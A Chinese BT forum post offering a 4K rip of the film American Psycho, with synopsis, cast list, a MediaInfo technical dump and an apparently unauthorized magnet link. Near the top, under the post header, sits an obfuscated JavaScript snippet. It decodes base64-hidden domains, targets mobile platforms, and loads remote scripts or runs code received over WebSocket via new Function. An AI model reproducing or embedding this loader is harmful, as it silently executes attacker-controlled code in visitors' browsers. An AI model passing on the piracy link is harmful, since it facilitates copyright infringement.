美国精神病人[双语字幕].American.Psycho.2000.2160p.HDR.UHD.BluRay.DTS-HD.MA.5.1.x265-10bit-迅雷下载 10.63GB

版主小s 20天前 167

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 美国精神病人 / 美色杀人狂 / 美国杀人狂 / 美国狂人 / 美国狂魔 / 美国精神病

◎片 名 American Psycho

◎年 代 2000

◎产 地 美国

◎类 别 剧情 / 惊悚 / 犯罪

◎语 言 英语 / 西班牙语 / 粤语

◎上映日期 2000-01-21(圣丹斯电影节) / 2000-04-14(美国)

◎IMDb链接 https://www.imdb.com/title/tt0144084/

◎豆瓣评分 7.8/10 (67061人评价)

◎豆瓣链接 https://movie.douban.com/subject/1301715/

◎片 长 102 分钟

◎导 演 玛丽·哈伦 Mary Harron (id:1014133)

◎编 剧 玛丽·哈伦 Mary Harron (id:1014133)

吉娜薇·特纳 Guinevere Turner (id:1018166)

◎演 员 克里斯蒂安·贝尔 Christian Bale (id:1005773)

贾斯汀·塞洛克斯 Justin Theroux (id:1025199)

乔什·卢卡斯 Josh Lucas (id:1017919)

比尔·萨奇 Bill Sage (id:1145394)

科洛·塞维尼 Chlo? Sevigny (id:1040533)

瑞茜·威瑟斯彭 Reese Witherspoon (id:1031217)

萨曼莎·玛西丝 Samantha Mathis (id:1048132)

杰瑞德·莱托 Jared Leto (id:1013764)

威廉·达福 Willem Dafoe (id:1010539)

卡拉·西摩 Cara Seymour (id:1297274)

吉娜薇·特纳 Guinevere Turner (id:1018166)

斯蒂夫·博加尔特 Stephen Bogaert (id:1350047)

玛丽·达姆 Marie Dame (id:1371762)

马特·罗斯 Matt Ross (id:1014057)

克里丝塔·萨顿 Krista Sutton (id:1154534)

Chris Hanley Chris Hanley (id:1285968)

罗伯·魏斯 Rob Weiss (id:1295769)

约瑟夫·德雷克 Joseph Drake (id:1282700)

亚历山卓·卡蒙 Alessandro Camon (id:1279957)

安德鲁·马库斯 Andrew Marcus (id:1290965)

安德鲁·M·斯蒂恩 Andrew M. Stearn (id:1298293)

伊西斯·马森登 Isis Mussenden (id:1019610)

Andrew Shea Andrew Shea (id:1297370)

安德鲁·马库斯 Andrew Marcus (id:1290965)

◎标 签 犯罪 / 美国 / 心理 / 惊悚 / 悬疑 / ChristianBale / 美国电影 / 2000

◎简 介

本片改编自布莱特·伊斯顿·艾利斯极具争议的同名小说,是一部描述20世纪80年代末期美国都市生活的黑色社会讽刺片。

帕特里克·贝特曼(克里斯蒂安·贝尔ChristianBale饰)是华尔街的骄子,炙手可热的股票经纪人,英俊迷人,谈吐风趣幽默,年轻有为的他每天给自己的客户们赚进无数的美元。可当夜幕降临时,黑暗的无边恐怖唤醒了贝特曼双重性格中的另一面。他将一个个猎物绑架到他的豪华公寓,一点一点折磨,看着鲜血慢慢涌出,猎物痛苦地死去,一种莫名的快感袭击着他。他身份使得调查这一系列罪案的警官从未把他列为嫌疑对象,而另外一名同样嗜血的杀人狂却想作下一件更为血腥的案子,成为真正的杀手之王。贝特曼的双重性格让他终日忙碌。然而罪恶终是无法掩盖,一个冷血的连环杀人案凶手的结局会是怎样呢?贝特曼会被抓住吗?

  1. General

  2. Unique ID : 209588746128472497082337209660341528381 (0x9DAD52FFEBB2E3411E541D526E24A73D)

  3. Complete name : American.[email protected]BBQDDQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 10.6 GiB

  7. Duration : 1 h 42 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 14.9 Mb/s

  10. Movie name : American Psycho 2000 2160p HDR UHD BluRay DTS-HD MA 5.1 [email protected]

  11. Encoded date : UTC 2021-07-11 01:05:14

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 42 min

  22. Bit rate : 12.8 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 600 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.087

  32. Stream size : 9.11 GiB (86%)

  33. Title : @HDSky

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  43. Maximum Content Light Level : 739 cd/m2

  44. Maximum Frame-Average Light Level : 331 cd/m2


  45. Audio

  46. ID : 2

  47. Format : DTS XLL

  48. Format/Info : Digital Theater Systems

  49. Commercial name : DTS-HD Master Audio

  50. Codec ID : A_DTS

  51. Duration : 1 h 42 min

  52. Bit rate mode : Variable

  53. Bit rate : 2 057 kb/s

  54. Channel(s) : 6 channels

  55. Channel layout : C L R Ls Rs LFE

  56. Sampling rate : 48.0 kHz

  57. Frame rate : 93.750 FPS (512 SPF)

  58. Bit depth : 16 bits

  59. Compression mode : Lossless

  60. Stream size : 1.47 GiB (14%)

  61. Title : English

  62. Language : English

  63. Default : Yes

  64. Forced : No


  65. Text #1

  66. ID : 3

  67. Format : PGS

  68. Muxing mode : zlib

  69. Codec ID : S_HDMV/PGS

  70. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  71. Duration : 1 h 36 min

  72. Bit rate : 29.3 kb/s

  73. Count of elements : 2509

  74. Stream size : 20.2 MiB (0%)

  75. Title : CHS

  76. Language : Chinese

  77. Default : Yes

  78. Forced : No


  79. Text #2

  80. ID : 4

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 36 min

  86. Bit rate : 30.3 kb/s

  87. Count of elements : 2509

  88. Stream size : 20.8 MiB (0%)

  89. Title : CHT

  90. Language : Chinese

  91. Default : No

  92. Forced : No


  93. Text #3

  94. ID : 5

  95. Format : PGS

  96. Muxing mode : zlib

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 1 h 36 min

  100. Bit rate : 49.0 kb/s

  101. Count of elements : 2509

  102. Stream size : 33.7 MiB (0%)

  103. Title : CHS&ENG

  104. Language : Chinese

  105. Default : No

  106. Forced : No


  107. Text #4

  108. ID : 6

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 36 min

  114. Bit rate : 49.9 kb/s

  115. Count of elements : 2509

  116. Stream size : 34.4 MiB (0%)

  117. Title : CHT&ENG

  118. Language : Chinese

  119. Default : No

  120. Forced : No


  121. Menu

  122. 00:00:00.000 : en:Chapter 01

  123. 00:07:09.137 : en:Chapter 02

  124. 00:12:20.823 : en:Chapter 03

  125. 00:17:08.319 : en:Chapter 04

  126. 00:23:17.438 : en:Chapter 05

  127. 00:31:17.209 : en:Chapter 06

  128. 00:37:32.125 : en:Chapter 07

  129. 00:46:19.568 : en:Chapter 08

  130. 00:51:55.696 : en:Chapter 09

  131. 00:56:57.998 : en:Chapter 10

  132. 01:04:58.728 : en:Chapter 11

  133. 01:09:30.625 : en:Chapter 12

  134. 01:16:16.906 : en:Chapter 13

  135. 01:24:52.004 : en:Chapter 14

  136. 01:33:46.538 : en:Chapter 15

  137. 01:37:05.611 : en:Chapter 16


TAGS 剧情 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:819ED74F87019C2457D44AEA64C42DE043701D90
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回